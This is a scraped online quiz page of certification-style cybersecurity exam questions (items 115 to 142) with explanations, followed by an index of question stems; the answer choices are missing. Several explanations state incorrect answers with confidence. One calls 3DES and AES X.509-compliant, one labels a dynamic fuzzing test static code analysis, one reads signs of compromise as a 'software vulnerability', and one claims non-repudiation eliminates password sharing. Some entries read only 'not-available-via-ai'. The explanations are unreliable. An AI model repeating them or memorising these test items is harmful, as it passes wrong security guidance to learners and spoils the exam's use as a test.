The administrator should recommend a review and modification of the log aggregation and analysis process because it took several months to detect the unauthorized activity. This suggests that the logs were not being properly monitored or analyzed in a timely manner. Additionally, the administrator should recommend a review and modification of the acceptable use policies because the local privileged user was accessing the internet, which may be a violation of the organization's policy.

Submit
115. Which of the following BEST explains the purpose of data ownership policy?

Explanation

The purpose of a data ownership policy is to clearly define the roles and responsibilities between users and managers when it comes to data. It also aims to establish how specific data types should be managed. This policy ensures that everyone in the organization understands their obligations and the proper procedures for handling and protecting data.

Submit
116. An analyst was testing the latest version of internally developed CRM system. The analyst created a basic user account. Using a few tools in Kali's latest distribution, the analyst was able to access configuration files, change permission on folders and groups, and delete and create new system objects. Which of the following techniques did the analyst use to preform these unauthorized services?

Explanation

The analyst used privilege escalation to perform these unauthorized services. Privilege escalation refers to the act of gaining higher levels of access or permissions than originally granted. In this case, the analyst was able to access configuration files, change permissions, and manipulate system objects, indicating that they were able to elevate their privileges beyond what their basic user account should have allowed.

Submit
117. An analyst wants to use a command line tool to identify open ports and running services on a host along with application that is associated with those services and ports. Which of the following should the analyst use?

Explanation

The analyst should use Netstat to identify open ports and running services on a host. Netstat is a command line tool that displays active network connections, listening ports, and routing tables. It provides information about the state of TCP/IP connections and the processes that are using them. By using Netstat, the analyst can determine which ports are open and what services are associated with those ports.

Submit
118. While reviewing the proxy logs, the security analyst noticed a suspicious traffic pattern. Several internal hosts were observed communicating with an external IP address over port 80 constantly. An incident was declared, and an investigation was launched. After interviewing the affected users, the analyst determined the activity started right after deploying a new graphics suite. Based on the information, which of the following actions would be the appropriate NEXT step in the investigation?

Explanation

The appropriate next step in the investigation would be to identify the destination IP address and its owner. This will help in determining if the communication is legitimate or malicious. Additionally, examining the running processes on the affected hosts will provide further insight into the nature of the activity. This step will help in gathering more information before taking any further actions.

Submit
119. Which of the following principles describes how a security analyst should communicate during an incident?

Explanation

The principle that describes how a security analyst should communicate during an incident is that the communication should be limited to security staff only. This means that the analyst should only share information and updates about the incident with other members of the security team who are directly involved in managing and resolving the incident. By limiting communication to trusted and knowledgeable individuals within the security staff, sensitive information is kept confidential and the incident response process can be effectively coordinated without unnecessary distractions or potential leaks of information.

Submit
120. A company invested 10 percent of its entire annual budget in security technologies. The Chief information officer (CIO) is convinced that, without his investment, the company will risk being the next victim of the same cyber attacks its competitors experiences 3 months ago. However, despite this investment, users are sharing their usernames and passwords with their coworkers to get jobs done. Which of the following will eliminate the risk introduced by this practice 

Explanation

Investing in and implementing a solution to ensure non-repudiation will eliminate the risk introduced by users sharing their usernames and passwords. Non-repudiation ensures that the actions of a user cannot be denied or falsely attributed to someone else. By implementing this solution, the company can track and authenticate user actions, making it impossible for users to share their credentials without being identified. This will discourage the practice of sharing usernames and passwords, thereby reducing the risk of unauthorized access and potential cyber attacks.

Submit
121. A cybersecurity analyst is reviewing the current BYOD security posture. The users must be able to synchronize their calendars, email. and contacts to a smartphone or other personal devices. The recommendation must provide the most flexibility to users. Which of the following recommendations would meet both the mobile data protection efforts and the business requirements described in this scenario?

Explanation

The recommended solution of developing a minimum security baseline while restricting the type of data that can be accessed would meet both the mobile data protection efforts and the business requirements. This approach allows users to synchronize their calendars, email, and contacts to their personal devices while also implementing security measures to protect sensitive data. By setting a minimum security baseline, the organization can ensure that only necessary data is accessed and reduce the risk of unauthorized access or data breaches. This solution strikes a balance between flexibility for users and maintaining security for the organization.

Submit
122. A web application has a newly discovered vulnerability in the authentication method used to validate known company users. the user ID of Admin with a password "password" grand elevated access to the application over the internet. Which of the following is the BEST method to discover the vulnerability before a production deployment?

Explanation

A manual peer review involves having experienced individuals review the code and logic of the web application. This can help identify vulnerabilities and potential weaknesses in the authentication method. Since the vulnerability has already been discovered, a manual peer review can help identify and fix the issue before the application is deployed in a production environment. User acceptance testing, input validation, and stress testing may also be helpful in identifying vulnerabilities, but a manual peer review is considered the best method in this scenario.

Submit
123. Due to the new regulations, a company has decided to institute an organizational vulnerability management program and assign the function to a security team. Which of the following frameworks would BEST support the program (select two)

Explanation

NIST (National Institute of Standards and Technology) and ISO 27000 series are the best frameworks to support the organizational vulnerability management program. NIST provides a comprehensive set of security controls and guidelines that can be used to identify and mitigate vulnerabilities. ISO 27000 series is a widely recognized international standard for information security management systems, which includes risk assessment and treatment processes to address vulnerabilities. Together, these frameworks provide a solid foundation for implementing an effective vulnerability management program.

Submit
124. A software assurance lab is preforming a dynamic assessment by automatically generating and inputting different, random data sets to attempt to cause an error/failure condition. Which of the following software assessment capabilities is the lab preforming AND during which phase of the SDLC should this occur ( Select two)

Explanation

The lab is performing fuzzing and static code analysis. Fuzzing involves inputting random data sets to test for error/failure conditions, while static code analysis involves analyzing the source code for potential issues. These activities are typically performed during the development phase of the SDLC to identify and address any vulnerabilities or bugs in the software before it is deployed.

Submit
125.  A security analyst is performing a forensic analysis on a machine that was the SIEM alerts. The analyst noticed some network connections utilizing SSL on non-common ports, copies of svchost.exe and cmd.exe in % TEMP% folder, and folder, and RDP files that had connected to external IPs. Which of the following has the security analyst uncovered ?

Explanation

The security analyst has uncovered a software vulnerability. The presence of network connections utilizing SSL on non-common ports, copies of svchost.exe and cmd.exe in the %TEMP% folder, and RDP files that had connected to external IPs indicate that the machine has been compromised by an attacker who is exploiting a vulnerability in the software. This suggests that the attacker has gained unauthorized access and is using various techniques to maintain control over the compromised machine.

Submit
126. The security operations team is conducting a mock forensics investigation. Which of the following should be the FIRST action taken after a seizing a compromised workstation?

Explanation

After seizing a compromised workstation, the first action should be to implement the incident response plan. This is because the incident response plan provides a systematic approach to handle security incidents and outlines the necessary steps to mitigate the impact of the compromise. By implementing the incident response plan, the security operations team can quickly and effectively respond to the incident, contain the compromise, and start the process of investigating and remediating the issue. Activating the escalation checklist, analyzing the forensic image, and performing evidence acquisition are important steps in the overall investigation process, but they should be done after implementing the incident response plan.

Submit
127. A university wants to increase the security posture of its network by implementing vulnerability scan of both centrally managed and student/employee laptops. The solution should be able to scale, provide minimum false positive and high accuracy of results, and be centrally managed though an enterprise console. Which of the following scanning topologies is BEST suited for this environment?

Explanation

A combination of server-based and agent-based scanning engines is the best suited scanning topology for this environment because it allows for scalability, high accuracy of results, and centralized management through an enterprise console. Server-based scanning engines can be deployed centrally and perform vulnerability scans on the centrally managed laptops, while agent-based scanning engines can be installed on the student/employee laptops to scan them individually. This combination ensures that all laptops are scanned for vulnerabilities, provides accurate results, and allows for efficient management through a centralized console.

Submit
128. The number of emails containing malicious attachments has increased dramatically in the last month. As a result, management has directed the security analysts to research products that can help analyze the behaviors of the malware in an isolated environment without affecting production systems. Which of the following should the security analyst recommend?

Explanation

not-available-via-ai

Submit
129. A threat intelligence analyst who works for a financial services firm received the report:​"There has been an effective waterhole campaign residing at www.bankfinancecompsoftware.com. This domain is delivering ransomware. This ransomware has been called "Lockmaster" by researchers due to it ability to overwrite the MBR, but this item is not malware signature. Please execute a defensive operation regarding this attack vector".​The analyst ran a query and has assessed that this traffic has not been seen on the network. Which of the following actions should the analyst do NEXT? (select two)

Explanation

The analyst should advise the firewall engineer to implement a block on the domain because the report indicates that the domain is delivering ransomware. By blocking the domain, the analyst can prevent any potential infections from occurring. Additionally, the analyst should produce a threat intelligence message to be disseminated to the company. This will inform other employees and stakeholders about the threat and provide guidance on how to respond to it effectively.

Submit
130. During a penetration test, a red team was able to collect the following dat via phone:​OS: WindowsIP: 172.16.12.9​Password: ApplesAV: Norton​Which of the following threat vectors enables this collection ?

Explanation

The red team was able to collect the data via phone, which suggests that they were able to trick or deceive someone into providing the information. Phishing is a common method used to trick individuals into revealing sensitive information such as passwords or personal details. It involves sending fraudulent emails or messages that appear to be from a legitimate source, in order to trick the recipient into providing the requested information. In this case, the red team was likely able to collect the data by using phishing techniques to deceive the target into revealing their OS, IP, password, and AV information.

Submit
131. An organizations is requesting the development of a disaster recovery plan. The organization has grown so has the infrastructure. Documentation, policies, and procedure do not exist. Which of the following steps should be taken to assist in the development of the disaster recovery plan?

Explanation

To assist in the development of a disaster recovery plan for an organization that lacks documentation, policies, and procedures, conducting a risk assessment is the most appropriate step. A risk assessment will help identify potential threats and vulnerabilities, allowing the organization to prioritize its resources and efforts in developing a comprehensive disaster recovery plan. This step will provide a foundation for understanding the risks and developing strategies to mitigate them effectively. It is crucial to assess the risks before proceeding with other steps such as developing a data retention policy, executing vulnerability scanning, or identifying assets.

Submit
132. Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, and how it was remediated, in addition to incident response effectiveness and any identified gaps needing improvement?

Explanation

A forensic analysis report is a document that includes detailed information on when an incident was detected, how impactful the incident was, and how it was remediated. It also includes information on incident response effectiveness and any identified gaps needing improvement. This report is used to provide a comprehensive analysis of the incident, including the timeline of events, the extent of the damage, and the effectiveness of the response. It is a crucial document in incident response and can be used for future reference and improvement.

Submit
133. Which of the following remediation strategies are MOST effective in reducing the risk of a network-based compromise of embedded ICS (select two)

Explanation

Segmentation and firewalling are the most effective remediation strategies in reducing the risk of a network-based compromise of embedded ICS. Segmentation involves dividing the network into smaller, isolated segments to limit the potential impact of an attack. This helps to contain any compromise within a specific segment and prevents lateral movement. Firewalling involves implementing firewalls to filter and control network traffic, allowing only authorized connections and blocking malicious traffic. This helps to protect the network and prevent unauthorized access or communication with the embedded ICS devices.

Submit
134. An analyst finds that unpatched servers have undetected vulnerabilities because the vulnerability scanner does not have the latest set of signatures. Management directed the security team to have personnel update the scanners with the latest signatures at least 24 hours before conducting an scan, but the outcome is unchanged. Which of the following is the BEST logical control to address the failure?

Explanation

not-available-via-ai

Submit
135. Considering confidentiality and integrity, which of the following makes servers more secure than desktops?

Explanation

The operating system (OS) plays a crucial role in enhancing the security of servers compared to desktops. Servers typically use specialized server operating systems that are designed with robust security features and protocols. These OSs offer better protection against unauthorized access, malware, and other security threats. Additionally, physical access restrictions, such as secure data centers and restricted entry, further enhance server security by preventing unauthorized individuals from physically accessing the server hardware.

Submit
136. The new chief technology officer is seeking recommendations for network monitoring services for the local internet. The CTO would like the capability to monitor all traffic and from the gateway, as well as the ability to block certain content. Which of the following recommendations would meet the needs of this organizations?

Explanation

not-available-via-ai

Submit
137. An organization want to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been preformed and analysts are reviewing the results. Before starting an remediation, the analysts want to remove false positives to avoid spending time on issues that ae actual vulnerabilities. Which of following would be an indicator of a likely false positive?

Explanation

The indicator of a likely false positive in this scenario is when the reports show the scanner compliance plug-in is out-of-date. This suggests that the vulnerability scanner may not be accurately identifying vulnerabilities due to its outdated status. Therefore, the organization can consider this as a false positive and focus on other vulnerabilities that are more reliable and up-to-date.

Submit
138. Which of the following has occurred

Explanation

not-available-via-ai

Submit
139. Which of following represent the reasoning behind careful pf the timelines and time day boundaries for and time of boundaries for an authorized penetration test?

Explanation

The careful planning of timelines and time boundaries for an authorized penetration test is important to mitigate any unintended impacts to operations. By scheduling the test activities, personnel resources can be allocated efficiently. Additionally, determining the frequency of team communication and reporting ensures effective coordination and monitoring of the test. By avoiding conflicts with real intrusions that may occur, the test can be conducted without causing disruptions or confusion. Lastly, ensuring that the test has measured impact to operations helps in assessing the effectiveness of the test and identifying areas for improvement.

Submit
140. Which of the following actions should occur to address any open issues while closing an incident involving various departments within the network

Explanation

The correct answer is "none of the above" because the actions mentioned in the options (Incident Response Plan, Lesson learned report, reverse engineering process, chain of custody documentation) do not directly address open issues while closing an incident involving various departments within the network. These options may be relevant in other stages of incident response or for different purposes, but they are not specifically focused on addressing open issues during the closure of an incident.

Submit
141. An analyst was tasked with providing recommendations of technologies that are PKI X.509 compliant for a variety of secure functions. Which of the following technologies meet the compatibility requirements (Select three) 

Explanation

The analyst was asked to recommend technologies that are PKI X.509 compliant for secure functions. 3DES, AES, and SSL/TLS meet the compatibility requirements. 3DES (Triple Data Encryption Standard) is a symmetric encryption algorithm that provides strong security. AES (Advanced Encryption Standard) is also a symmetric encryption algorithm that is widely used and considered secure. SSL/TLS (Secure Sockets Layer/Transport Layer Security) are protocols that provide secure communication over the internet. These technologies all support PKI X.509 and can be used for secure functions.

Submit
142. A security analyst received a compromised workstation. The workstation's hard drive may contain evidence of criminal activities. Which of the following is the First thing the analyst must do to ensure the integrity of a hard drive while preforming the analysis?

Explanation

To ensure the integrity of the hard drive while performing the analysis, the security analyst should make a copy of the hard drive. This is important because creating a copy ensures that the original evidence remains untouched and unaltered, allowing the analyst to work with the copy without compromising the integrity of the original data. By making a copy, any changes made during the analysis will only affect the duplicate, preserving the integrity of the original evidence.

Submit
View My Results

Quiz Review Timeline (Updated): Mar 22, 2023 +

Our quizzes are rigorously reviewed, monitored and continuously updated by our expert board to maintain accuracy, relevance, and timeliness.

  • Current Version
  • Mar 22, 2023
    Quiz Edited by
    ProProfs Editorial Team
  • Oct 11, 2017
    Quiz Created by
    Heavenlymixed86
Cancel
  • All
    All (142)
  • Unanswered
    Unanswered ()
  • Answered
    Answered ()
An analyst is observing unusual network traffic from a workstation....
Which of the following is MOST effective for correlation analysis by...
The director of software development is concerned with recent web...
After analyzing ad correlating  activity from multiple sensors,...
The director of software development is concerned with recent web...
Which of the following commands would a security analyst use to make a...
As part of upcoming engagement for client, an analyst is configuring a...
An Administrator has been investigating the way in which an actor has...
Management is concerned with administrator access from outside the...
An administrator has been investigating the way in which an actor had...
The Chief Information Security Officer (CISO) has asked the security...
A security analyst has determined that the user interface on an...
A company has recently launched a new billing invoice for a few key...
A blue team hunted for identified a previously unknown malicious...
A cybersecurity analyst traced the source of an attack to compromised...
A cybersecurity analyst is conduction a security test to ensure the...
A recent vulnerability scan found four vulnerabilities on an...
During a routine review of firewall logs, an analyst identified that...
A recent audit has uncovered several coding errors and a lack of input...
A cybersecurity analyst has received a report that multiple systems...
While a threat intelligence analyst was researched an indicator of...
During the post-seizure analysis of a workstation, the technician...
A system Administrator has reviewed the following output#nmap...
A security analyst has been asked to remediate a server...
File integrity monitoring states the following files have been change....
A cybersecurity analyst has identified a new mission-essential...
Nmap scan results on a set of IP addresses returned one or more lines...
An executive tasked a security analyst to aggregate past lost, traffic...
An organization wants to harden its web servers. As part of this goal,...
A technician is running an intensive vulnerability scan to detect...
Which of the following BEST describes the offensive participants in a...
An HR employee began having issues with a device becoming unresponsive...
A security analyst is creating baseline system images to remediate...
A threat intelligence feed has posted an alert stating there is a...
A small bank employs an administrator who manages configurations,...
A system administrator who was using an account with elevated...
A company that is hiring a penetration tester want to exclude social...
Which of the following are essential components within the rules of...
An organization has recently recovered from an incident where a...
A security analyst wants to scan the network for active hosts. Which...
Which of the following is a feature if virtualization that can...
A security audit revealed that port 389 has been used instead of 636...
A cyber security analyst has several log files to review. Instead of...
A security analyst is reviewing IDS logs and notices the following...
A reverse engineer was analyzing malware found on a retailers network...
A software patch has been released to remove vulnerabilities from...
A cybersecurity has received a laptop of a user who recently left the...
As part of the SDLC, software developers are testing the security of a...
A technician is running an intensive vulnerability scan to detect...
Which of the following best practices is used to identify areas in the...
After running a packet analyzer on the network, a security has notice...
A vulnerability scan has returned the following informationDetailed...
A security analyst is adding input to the incident response...
A security analyst is preforming a review of Active directory and...
Company A permits visiting business patterns from a Company B to...
When preparing for a third-party audit, the vice president of risk...
An analyst has received unusual alerts on the SIEM dashboard. The...
A cybersecurity professional typed in a URL an discovered the admin...
A security analyst has created an image of a drive from an incident....
A cyber security analyst is completing an organizations vulnerability...
A cybersecurity analyst was hired to resolve a security issue within a...
Following a security breach, a post-mortem was done to analyze the...
A security analyst has noticed an alert from the SIEM. A workstation...
A security administrator recently deployed and verified the...
A security analyst received a compromised workstation. The...
AN alert has been distributed throughout the information security...
Law enforcement has contacted a corporation's legal counsel...
A company wants to update its acceptable use policy (AUP) to ensure it...
A security professional is analyzing the results of a network...
A cybersecurity analyst is retained by a firm from an open...
A security analyst is reviewing the following log after enabling...
An organization is attempting to harden its web server and reduce the...
Which of the following tools should a cybersecurity analyst use to...
A cybersecurity analyst has run a vulnerability scan and found...
External users are reporting that a web application is slow and...
The help desk informed a security analyst of a trend that is beginning...
A new policy requires the security team to preform web applications...
During a review of security controls, an analyst was able to an...
In order to meet regulatory compliance objectives for the storage of...
A threat intelligence analyst who works for a technology firm received...
An incident report indicated a virus was introduced though a remote...
A malicious user is receiving the following output​root:~#ping...
A cybersecurity analyst has several SIEM event logs to review for...
A security analyst is to configure a vulnerability scan for a new...
An application development company released da new version of its...
A security analyst of a small regional back has received an alert that...
A security analyst has been notified by the IDS that website XYZ is...
The Chief Information Office (CIO) of a company has been receiving an...
A cybersecurity analyst has received an alert that well-known...
A security administrator for a bank branch office preformed a routine...
After completing a vulnerability scan, the following output was...
Following a data compromise, a cybersecurity analyst noticed the...
A cybersecurity analyst is currently investigating a server outage....
A company is running Microsoft on a file server. A vulnerability scan...
A security analyst is reviewing logs and discovers that a...
The software development team pushed a new web application into...
The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing...
An analyst has initiated an assessment of an organization's...
Given the following code:<script...
A security analysis is concerned that employees may attempt to...
Creating a lessons learned report following an incident will help an...
A security analyst has requested to see specific security information...
A company has been a victim of multiple volumetric DoS attacks. Packet...
Given the following access log:​Access _log: 10.1.1.3 - - [...
An organization uses common Vulnerability Scoring System (CVSS) scores...
A cybersecurity analyst was asked to secure the Chief Executive...
An organization followed an SDLC process for vulnerability remediation...
A security analyst is preforming a static code of a review of a web...
After reviewing the following packet, a cybersecurity analyst has...
A security analyst has noticed that a particular server has consumed...
​A security analyst is conducting traffic analysis and observes an...
An analyst is reviewing logs for a web application and discovers the...
A cybersecurity analyst is reviewing the following...
A security administrator determines several months after the first...
Which of the following BEST explains the purpose of data ownership...
An analyst was testing the latest version of internally developed CRM...
An analyst wants to use a command line tool to identify open ports and...
While reviewing the proxy logs, the security analyst noticed a...
Which of the following principles describes how a security analyst...
A company invested 10 percent of its entire annual budget in security...
A cybersecurity analyst is reviewing the current BYOD security...
A web application has a newly discovered vulnerability in the...
Due to the new regulations, a company has decided to institute an...
A software assurance lab is preforming a dynamic assessment by...
 A security analyst is performing a forensic analysis on a...
The security operations team is conducting a mock forensics...
A university wants to increase the security posture of its network by...
The number of emails containing malicious attachments has increased...
A threat intelligence analyst who works for a financial services firm...
During a penetration test, a red team was able to collect the...
An organizations is requesting the development of a disaster recovery...
Which of the following items represents a document that includes...
Which of the following remediation strategies are MOST effective in...
An analyst finds that unpatched servers have undetected...
Considering confidentiality and integrity, which of the following...
The new chief technology officer is seeking recommendations for...
An organization want to remediate vulnerabilities associated with its...
Which of the following has occurred
Which of following represent the reasoning behind careful pf the...
Which of the following actions should occur to address any open issues...
An analyst was tasked with providing recommendations of technologies...
A security analyst received a compromised workstation. The...
Alert!

Advertisement